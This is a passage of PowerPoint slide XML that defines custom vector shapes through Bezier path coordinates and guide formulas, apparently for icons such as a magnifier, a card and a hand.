                  <a:cubicBezTo>
                    <a:pt x="0" y="198"/>
                    <a:pt x="22" y="183"/>
                    <a:pt x="31" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="136"/>
                    <a:pt x="11" y="115"/>
                    <a:pt x="11" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="42"/>
                    <a:pt x="53" y="0"/>
                    <a:pt x="104" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="156" y="0"/>
                    <a:pt x="198" y="42"/>
                    <a:pt x="198" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="145"/>
                    <a:pt x="156" y="187"/>
                    <a:pt x="104" y="187"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="76" y="137"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="145"/>
                    <a:pt x="81" y="151"/>
                    <a:pt x="89" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="151"/>
                    <a:pt x="106" y="144"/>
                    <a:pt x="106" y="134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="126"/>
                    <a:pt x="100" y="120"/>
                    <a:pt x="92" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="120"/>
                    <a:pt x="76" y="128"/>
                    <a:pt x="76" y="137"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="109" y="33"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="33"/>
                    <a:pt x="87" y="37"/>
                    <a:pt x="81" y="4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9" y="54"/>
                    <a:pt x="95" y="53"/>
                    <a:pt x="102" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="53"/>
                    <a:pt x="112" y="56"/>
                    <a:pt x="112" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="67"/>
                    <a:pt x="105" y="72"/>
                    <a:pt x="99" y="79"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="89"/>
                    <a:pt x="85" y="98"/>
                    <a:pt x="83" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="109"/>
                    <a:pt x="83" y="110"/>
                    <a:pt x="83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7" y="110"/>
                    <a:pt x="107" y="109"/>
                    <a:pt x="107" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="100"/>
                    <a:pt x="112" y="94"/>
                    <a:pt x="119" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="78"/>
                    <a:pt x="137" y="69"/>
                    <a:pt x="137" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="42"/>
                    <a:pt x="126" y="33"/>
                    <a:pt x="109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71F38524-5877-492D-B4A7-BE62A5E281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4979" y="2269146"/>
              <a:ext cx="1136121" cy="1131094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36ABC2CB-5150-4E31-95C4-CE04148F55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917578">
              <a:off x="3958060" y="4847123"/>
              <a:ext cx="1121507" cy="1128650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 199"/>
                <a:gd name="T1" fmla="*/ 74 h 200"/>
                <a:gd name="T2" fmla="*/ 6 w 199"/>
                <a:gd name="T3" fmla="*/ 103 h 200"/>
                <a:gd name="T4" fmla="*/ 21 w 199"/>
                <a:gd name="T5" fmla="*/ 127 h 200"/>
                <a:gd name="T6" fmla="*/ 45 w 199"/>
                <a:gd name="T7" fmla="*/ 143 h 200"/>
                <a:gd name="T8" fmla="*/ 74 w 199"/>
                <a:gd name="T9" fmla="*/ 149 h 200"/>
                <a:gd name="T10" fmla="*/ 97 w 199"/>
                <a:gd name="T11" fmla="*/ 145 h 200"/>
                <a:gd name="T12" fmla="*/ 117 w 199"/>
                <a:gd name="T13" fmla="*/ 135 h 200"/>
                <a:gd name="T14" fmla="*/ 181 w 199"/>
                <a:gd name="T15" fmla="*/ 200 h 200"/>
                <a:gd name="T16" fmla="*/ 192 w 199"/>
                <a:gd name="T17" fmla="*/ 194 h 200"/>
                <a:gd name="T18" fmla="*/ 199 w 199"/>
                <a:gd name="T19" fmla="*/ 181 h 200"/>
                <a:gd name="T20" fmla="*/ 135 w 199"/>
                <a:gd name="T21" fmla="*/ 117 h 200"/>
                <a:gd name="T22" fmla="*/ 145 w 199"/>
                <a:gd name="T23" fmla="*/ 97 h 200"/>
                <a:gd name="T24" fmla="*/ 149 w 199"/>
                <a:gd name="T25" fmla="*/ 74 h 200"/>
                <a:gd name="T26" fmla="*/ 143 w 199"/>
                <a:gd name="T27" fmla="*/ 45 h 200"/>
                <a:gd name="T28" fmla="*/ 127 w 199"/>
                <a:gd name="T29" fmla="*/ 22 h 200"/>
                <a:gd name="T30" fmla="*/ 103 w 199"/>
                <a:gd name="T31" fmla="*/ 6 h 200"/>
                <a:gd name="T32" fmla="*/ 74 w 199"/>
                <a:gd name="T33" fmla="*/ 0 h 200"/>
                <a:gd name="T34" fmla="*/ 45 w 199"/>
                <a:gd name="T35" fmla="*/ 6 h 200"/>
                <a:gd name="T36" fmla="*/ 21 w 199"/>
                <a:gd name="T37" fmla="*/ 22 h 200"/>
                <a:gd name="T38" fmla="*/ 6 w 199"/>
                <a:gd name="T39" fmla="*/ 45 h 200"/>
                <a:gd name="T40" fmla="*/ 0 w 199"/>
                <a:gd name="T41" fmla="*/ 74 h 200"/>
                <a:gd name="T42" fmla="*/ 22 w 199"/>
                <a:gd name="T43" fmla="*/ 74 h 200"/>
                <a:gd name="T44" fmla="*/ 26 w 199"/>
                <a:gd name="T45" fmla="*/ 54 h 200"/>
                <a:gd name="T46" fmla="*/ 37 w 199"/>
                <a:gd name="T47" fmla="*/ 37 h 200"/>
                <a:gd name="T48" fmla="*/ 54 w 199"/>
                <a:gd name="T49" fmla="*/ 26 h 200"/>
                <a:gd name="T50" fmla="*/ 74 w 199"/>
                <a:gd name="T51" fmla="*/ 22 h 200"/>
                <a:gd name="T52" fmla="*/ 95 w 199"/>
                <a:gd name="T53" fmla="*/ 26 h 200"/>
                <a:gd name="T54" fmla="*/ 111 w 199"/>
                <a:gd name="T55" fmla="*/ 37 h 200"/>
                <a:gd name="T56" fmla="*/ 123 w 199"/>
                <a:gd name="T57" fmla="*/ 54 h 200"/>
                <a:gd name="T58" fmla="*/ 127 w 199"/>
                <a:gd name="T59" fmla="*/ 74 h 200"/>
                <a:gd name="T60" fmla="*/ 123 w 199"/>
                <a:gd name="T61" fmla="*/ 95 h 200"/>
                <a:gd name="T62" fmla="*/ 111 w 199"/>
                <a:gd name="T63" fmla="*/ 112 h 200"/>
                <a:gd name="T64" fmla="*/ 95 w 199"/>
                <a:gd name="T65" fmla="*/ 123 h 200"/>
                <a:gd name="T66" fmla="*/ 74 w 199"/>
                <a:gd name="T67" fmla="*/ 127 h 200"/>
                <a:gd name="T68" fmla="*/ 54 w 199"/>
                <a:gd name="T69" fmla="*/ 123 h 200"/>
                <a:gd name="T70" fmla="*/ 37 w 199"/>
                <a:gd name="T71" fmla="*/ 112 h 200"/>
                <a:gd name="T72" fmla="*/ 26 w 199"/>
                <a:gd name="T73" fmla="*/ 95 h 200"/>
                <a:gd name="T74" fmla="*/ 22 w 199"/>
                <a:gd name="T75" fmla="*/ 7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200">
                  <a:moveTo>
                    <a:pt x="0" y="74"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="85"/>
                    <a:pt x="2" y="94"/>
                    <a:pt x="6" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="112"/>
                    <a:pt x="15" y="120"/>
                    <a:pt x="21" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="134"/>
                    <a:pt x="36" y="139"/>
                    <a:pt x="45" y="143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="147"/>
                    <a:pt x="64" y="149"/>
                    <a:pt x="74" y="149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="149"/>
                    <a:pt x="90" y="148"/>
                    <a:pt x="97" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="143"/>
                    <a:pt x="111" y="140"/>
                    <a:pt x="117" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="200"/>
                    <a:pt x="181" y="200"/>
                    <a:pt x="181" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="199"/>
                    <a:pt x="189" y="197"/>
                    <a:pt x="192" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="191"/>
                    <a:pt x="198" y="186"/>
                    <a:pt x="199" y="18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9" y="111"/>
                    <a:pt x="143" y="104"/>
                    <a:pt x="145" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="90"/>
                    <a:pt x="149" y="82"/>
                    <a:pt x="149" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="64"/>
                    <a:pt x="147" y="55"/>
                    <a:pt x="143" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="36"/>
                    <a:pt x="133" y="29"/>
                    <a:pt x="127" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="15"/>
                    <a:pt x="112" y="10"/>
                    <a:pt x="103" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="2"/>
                    <a:pt x="84" y="0"/>
                    <a:pt x="74" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="54" y="2"/>
                    <a:pt x="45" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="10"/>
                    <a:pt x="28" y="15"/>
                    <a:pt x="21" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="29"/>
                    <a:pt x="9" y="36"/>
                    <a:pt x="6" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="55"/>
                    <a:pt x="0" y="64"/>
                    <a:pt x="0" y="74"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="22" y="74"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="67"/>
                    <a:pt x="23" y="60"/>
                    <a:pt x="26" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="48"/>
                    <a:pt x="32" y="42"/>
                    <a:pt x="37" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="32"/>
                    <a:pt x="47" y="29"/>
                    <a:pt x="54" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="23"/>
                    <a:pt x="67" y="22"/>
                    <a:pt x="74" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="22"/>
                    <a:pt x="88" y="23"/>
                    <a:pt x="95" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="29"/>
                    <a:pt x="107" y="32"/>
                    <a:pt x="111" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="42"/>
                    <a:pt x="120" y="48"/>
                    <a:pt x="123" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="60"/>
                    <a:pt x="127" y="67"/>
                    <a:pt x="127" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="82"/>
                    <a:pt x="125" y="89"/>
                    <a:pt x="123" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="101"/>
                    <a:pt x="116" y="107"/>
                    <a:pt x="111" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="116"/>
                    <a:pt x="101" y="120"/>
                    <a:pt x="95" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="126"/>
                    <a:pt x="81" y="127"/>
                    <a:pt x="74" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="127"/>
                    <a:pt x="60" y="126"/>
                    <a:pt x="54" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="120"/>
                    <a:pt x="42" y="116"/>
                    <a:pt x="37" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="107"/>
                    <a:pt x="28" y="101"/>
                    <a:pt x="26" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="89"/>
                    <a:pt x="22" y="82"/>
                    <a:pt x="22" y="7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F4DFC3EB-FC06-41B6-AF02-8D93333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288">
              <a:off x="174628" y="3682300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FB01F950-D421-4DE1-B537-3007210442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092998">
              <a:off x="4595267" y="1827148"/>
              <a:ext cx="750888" cy="511175"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 199 w 200"/>
                <a:gd name="T1" fmla="*/ 32 h 136"/>
                <a:gd name="T2" fmla="*/ 199 w 200"/>
                <a:gd name="T3" fmla="*/ 31 h 136"/>
                <a:gd name="T4" fmla="*/ 0 w 200"/>
                <a:gd name="T5" fmla="*/ 31 h 136"/>
                <a:gd name="T6" fmla="*/ 0 w 200"/>
                <a:gd name="T7" fmla="*/ 18 h 136"/>
                <a:gd name="T8" fmla="*/ 18 w 200"/>
                <a:gd name="T9" fmla="*/ 0 h 136"/>
                <a:gd name="T10" fmla="*/ 181 w 200"/>
                <a:gd name="T11" fmla="*/ 0 h 136"/>
                <a:gd name="T12" fmla="*/ 199 w 200"/>
                <a:gd name="T13" fmla="*/ 18 h 136"/>
                <a:gd name="T14" fmla="*/ 199 w 200"/>
                <a:gd name="T15" fmla="*/ 32 h 136"/>
                <a:gd name="T16" fmla="*/ 200 w 200"/>
                <a:gd name="T17" fmla="*/ 64 h 136"/>
                <a:gd name="T18" fmla="*/ 200 w 200"/>
                <a:gd name="T19" fmla="*/ 119 h 136"/>
                <a:gd name="T20" fmla="*/ 181 w 200"/>
                <a:gd name="T21" fmla="*/ 136 h 136"/>
                <a:gd name="T22" fmla="*/ 18 w 200"/>
                <a:gd name="T23" fmla="*/ 136 h 136"/>
                <a:gd name="T24" fmla="*/ 0 w 200"/>
                <a:gd name="T25" fmla="*/ 119 h 136"/>
                <a:gd name="T26" fmla="*/ 0 w 200"/>
                <a:gd name="T27" fmla="*/ 64 h 136"/>
                <a:gd name="T28" fmla="*/ 200 w 200"/>
                <a:gd name="T29" fmla="*/ 64 h 136"/>
                <a:gd name="T30" fmla="*/ 76 w 200"/>
                <a:gd name="T31" fmla="*/ 88 h 136"/>
                <a:gd name="T32" fmla="*/ 48 w 200"/>
                <a:gd name="T33" fmla="*/ 88 h 136"/>
                <a:gd name="T34" fmla="*/ 48 w 200"/>
                <a:gd name="T35" fmla="*/ 100 h 136"/>
                <a:gd name="T36" fmla="*/ 76 w 200"/>
                <a:gd name="T37" fmla="*/ 100 h 136"/>
                <a:gd name="T38" fmla="*/ 76 w 200"/>
                <a:gd name="T39" fmla="*/ 88 h 136"/>
                <a:gd name="T40" fmla="*/ 112 w 200"/>
                <a:gd name="T41" fmla="*/ 88 h 136"/>
                <a:gd name="T42" fmla="*/ 88 w 200"/>
                <a:gd name="T43" fmla="*/ 88 h 136"/>
                <a:gd name="T44" fmla="*/ 88 w 200"/>
                <a:gd name="T45" fmla="*/ 100 h 136"/>
                <a:gd name="T46" fmla="*/ 112 w 200"/>
                <a:gd name="T47" fmla="*/ 100 h 136"/>
                <a:gd name="T48" fmla="*/ 112 w 200"/>
                <a:gd name="T49" fmla="*/ 88 h 136"/>
                <a:gd name="T50" fmla="*/ 152 w 200"/>
                <a:gd name="T51" fmla="*/ 88 h 136"/>
                <a:gd name="T52" fmla="*/ 120 w 200"/>
                <a:gd name="T53" fmla="*/ 88 h 136"/>
                <a:gd name="T54" fmla="*/ 120 w 200"/>
                <a:gd name="T55" fmla="*/ 100 h 136"/>
                <a:gd name="T56" fmla="*/ 152 w 200"/>
                <a:gd name="T57" fmla="*/ 100 h 136"/>
                <a:gd name="T58" fmla="*/ 152 w 200"/>
                <a:gd name="T59" fmla="*/ 88 h 136"/>
                <a:gd name="T60" fmla="*/ 12 w 200"/>
                <a:gd name="T61" fmla="*/ 119 h 136"/>
                <a:gd name="T62" fmla="*/ 152 w 200"/>
                <a:gd name="T63" fmla="*/ 119 h 136"/>
                <a:gd name="T64" fmla="*/ 152 w 200"/>
                <a:gd name="T65" fmla="*/ 108 h 136"/>
                <a:gd name="T66" fmla="*/ 12 w 200"/>
                <a:gd name="T67" fmla="*/ 108 h 136"/>
                <a:gd name="T68" fmla="*/ 12 w 200"/>
                <a:gd name="T69" fmla="*/ 119 h 136"/>
                <a:gd name="T70" fmla="*/ 12 w 200"/>
                <a:gd name="T71" fmla="*/ 100 h 136"/>
                <a:gd name="T72" fmla="*/ 40 w 200"/>
                <a:gd name="T73" fmla="*/ 100 h 136"/>
                <a:gd name="T74" fmla="*/ 40 w 200"/>
                <a:gd name="T75" fmla="*/ 88 h 136"/>
                <a:gd name="T76" fmla="*/ 12 w 200"/>
                <a:gd name="T77" fmla="*/ 88 h 136"/>
                <a:gd name="T78" fmla="*/ 12 w 200"/>
                <a:gd name="T79" fmla="*/ 10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136">
                  <a:moveTo>
                    <a:pt x="199" y="32"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="31"/>
                    <a:pt x="199" y="31"/>
                    <a:pt x="199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91" y="0"/>
                    <a:pt x="199" y="8"/>
                    <a:pt x="199" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="32"/>
                    <a:pt x="199" y="32"/>
                    <a:pt x="199" y="32"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="200" y="64"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="119"/>
                    <a:pt x="200" y="119"/>
                    <a:pt x="200" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="129"/>
                    <a:pt x="191" y="136"/>
                    <a:pt x="181" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="136"/>
                    <a:pt x="18" y="136"/>
                    <a:pt x="18" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="136"/>
                    <a:pt x="0" y="129"/>
                    <a:pt x="0" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="64"/>
                    <a:pt x="0" y="64"/>
                    <a:pt x="0" y="64"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="200" y="64"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="76" y="88"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="88"/>
                    <a:pt x="48" y="88"/>
                    <a:pt x="48" y="88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76" y="100"/>
                    <a:pt x="76" y="100"/>
                    <a:pt x="76" y="100"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="76" y="88"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="112" y="88"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="88"/>
                    <a:pt x="88" y="88"/>
                    <a:pt x="88" y="8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112" y="100"/>
                    <a:pt x="112" y="100"/>
                    <a:pt x="112" y="100"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="112" y="88"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="152" y="88"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="88"/>
                    <a:pt x="120" y="88"/>
                    <a:pt x="120" y="88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52" y="100"/>
                    <a:pt x="152" y="100"/>
                    <a:pt x="152" y="100"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="152" y="88"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="12" y="119"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="119"/>
                    <a:pt x="152" y="119"/>
                    <a:pt x="152" y="119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="108"/>
                    <a:pt x="152" y="108"/>
                    <a:pt x="152" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="108"/>
                    <a:pt x="12" y="108"/>
                    <a:pt x="12" y="108"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12" y="119"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="12" y="100"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="100"/>
                    <a:pt x="40" y="100"/>
                    <a:pt x="40" y="100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="88"/>
                    <a:pt x="40" y="88"/>
                    <a:pt x="40" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="88"/>
                    <a:pt x="12" y="88"/>
                    <a:pt x="12" y="88"/>
                  </a:cubicBez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D0793988-178A-4B2A-8785-1BC9C9BEE1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921052" y="2263598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427CDCBE-4649-47BA-B03F-F299EA89C39A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="3939485">
              <a:off x="7392355" y="1719266"/>
              <a:ext cx="544512" cy="749300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2C001408-BF89-4952-A455-AF3B593EF4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5400000">
              <a:off x="3167444" y="4702772"/>
              <a:ext cx="725487" cy="766763"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 32 w 193"/>
                <a:gd name="T1" fmla="*/ 24 h 204"/>
                <a:gd name="T2" fmla="*/ 73 w 193"/>
                <a:gd name="T3" fmla="*/ 81 h 204"/>
                <a:gd name="T4" fmla="*/ 68 w 193"/>
                <a:gd name="T5" fmla="*/ 60 h 204"/>
                <a:gd name="T6" fmla="*/ 75 w 193"/>
                <a:gd name="T7" fmla="*/ 47 h 204"/>
                <a:gd name="T8" fmla="*/ 92 w 193"/>
                <a:gd name="T9" fmla="*/ 58 h 204"/>
                <a:gd name="T10" fmla="*/ 99 w 193"/>
                <a:gd name="T11" fmla="*/ 56 h 204"/>
                <a:gd name="T12" fmla="*/ 100 w 193"/>
                <a:gd name="T13" fmla="*/ 42 h 204"/>
                <a:gd name="T14" fmla="*/ 117 w 193"/>
                <a:gd name="T15" fmla="*/ 44 h 204"/>
                <a:gd name="T16" fmla="*/ 119 w 193"/>
                <a:gd name="T17" fmla="*/ 48 h 204"/>
                <a:gd name="T18" fmla="*/ 125 w 193"/>
                <a:gd name="T19" fmla="*/ 57 h 204"/>
                <a:gd name="T20" fmla="*/ 126 w 193"/>
                <a:gd name="T21" fmla="*/ 53 h 204"/>
                <a:gd name="T22" fmla="*/ 137 w 193"/>
                <a:gd name="T23" fmla="*/ 47 h 204"/>
                <a:gd name="T24" fmla="*/ 161 w 193"/>
                <a:gd name="T25" fmla="*/ 132 h 204"/>
                <a:gd name="T26" fmla="*/ 121 w 193"/>
                <a:gd name="T27" fmla="*/ 185 h 204"/>
                <a:gd name="T28" fmla="*/ 76 w 193"/>
                <a:gd name="T29" fmla="*/ 151 h 204"/>
                <a:gd name="T30" fmla="*/ 21 w 193"/>
                <a:gd name="T31" fmla="*/ 131 h 204"/>
                <a:gd name="T32" fmla="*/ 34 w 193"/>
                <a:gd name="T33" fmla="*/ 122 h 204"/>
                <a:gd name="T34" fmla="*/ 64 w 193"/>
                <a:gd name="T35" fmla="*/ 125 h 204"/>
                <a:gd name="T36" fmla="*/ 17 w 193"/>
                <a:gd name="T37" fmla="*/ 33 h 204"/>
                <a:gd name="T38" fmla="*/ 20 w 193"/>
                <a:gd name="T39" fmla="*/ 19 h 204"/>
                <a:gd name="T40" fmla="*/ 12 w 193"/>
                <a:gd name="T41" fmla="*/ 7 h 204"/>
                <a:gd name="T42" fmla="*/ 6 w 193"/>
                <a:gd name="T43" fmla="*/ 40 h 204"/>
                <a:gd name="T44" fmla="*/ 45 w 193"/>
                <a:gd name="T45" fmla="*/ 109 h 204"/>
                <a:gd name="T46" fmla="*/ 19 w 193"/>
                <a:gd name="T47" fmla="*/ 111 h 204"/>
                <a:gd name="T48" fmla="*/ 27 w 193"/>
                <a:gd name="T49" fmla="*/ 157 h 204"/>
                <a:gd name="T50" fmla="*/ 99 w 193"/>
                <a:gd name="T51" fmla="*/ 175 h 204"/>
                <a:gd name="T52" fmla="*/ 116 w 193"/>
                <a:gd name="T53" fmla="*/ 204 h 204"/>
                <a:gd name="T54" fmla="*/ 181 w 193"/>
                <a:gd name="T55" fmla="*/ 166 h 204"/>
                <a:gd name="T56" fmla="*/ 186 w 193"/>
                <a:gd name="T57" fmla="*/ 147 h 204"/>
                <a:gd name="T58" fmla="*/ 161 w 193"/>
                <a:gd name="T59" fmla="*/ 61 h 204"/>
                <a:gd name="T60" fmla="*/ 161 w 193"/>
                <a:gd name="T61" fmla="*/ 60 h 204"/>
                <a:gd name="T62" fmla="*/ 155 w 193"/>
                <a:gd name="T63" fmla="*/ 44 h 204"/>
                <a:gd name="T64" fmla="*/ 128 w 193"/>
                <a:gd name="T65" fmla="*/ 33 h 204"/>
                <a:gd name="T66" fmla="*/ 93 w 193"/>
                <a:gd name="T67" fmla="*/ 30 h 204"/>
                <a:gd name="T68" fmla="*/ 68 w 193"/>
                <a:gd name="T69" fmla="*/ 35 h 204"/>
                <a:gd name="T70" fmla="*/ 59 w 193"/>
                <a:gd name="T71" fmla="*/ 41 h 204"/>
                <a:gd name="T72" fmla="*/ 44 w 193"/>
                <a:gd name="T73" fmla="*/ 16 h 204"/>
                <a:gd name="T74" fmla="*/ 13 w 193"/>
                <a:gd name="T75" fmla="*/ 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3" h="204">
                  <a:moveTo>
                    <a:pt x="20" y="19"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="16"/>
                    <a:pt x="29" y="19"/>
                    <a:pt x="32" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="24"/>
                    <a:pt x="65" y="79"/>
                    <a:pt x="65" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="83"/>
                    <a:pt x="71" y="82"/>
                    <a:pt x="73" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="79"/>
                    <a:pt x="77" y="75"/>
                    <a:pt x="74" y="69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5" y="56"/>
                    <a:pt x="68" y="52"/>
                    <a:pt x="73" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="48"/>
                    <a:pt x="74" y="47"/>
                    <a:pt x="75" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="45"/>
                    <a:pt x="83" y="44"/>
                    <a:pt x="86" y="48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4" y="61"/>
                    <a:pt x="96" y="61"/>
                    <a:pt x="97" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="60"/>
                    <a:pt x="99" y="56"/>
                    <a:pt x="99" y="56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6" y="47"/>
                    <a:pt x="97" y="44"/>
                    <a:pt x="100" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="42"/>
                    <a:pt x="102" y="41"/>
                    <a:pt x="104" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="39"/>
                    <a:pt x="115" y="38"/>
                    <a:pt x="117" y="44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8"/>
                    <a:pt x="121" y="60"/>
                    <a:pt x="124" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="58"/>
                    <a:pt x="125" y="58"/>
                    <a:pt x="125" y="57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6" y="50"/>
                    <a:pt x="127" y="49"/>
                    <a:pt x="128" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="47"/>
                    <a:pt x="134" y="47"/>
                    <a:pt x="137" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="47"/>
                    <a:pt x="144" y="53"/>
                    <a:pt x="147" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="132"/>
                    <a:pt x="161" y="132"/>
                    <a:pt x="161" y="132"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="155"/>
                    <a:pt x="174" y="155"/>
                    <a:pt x="174" y="155"/>
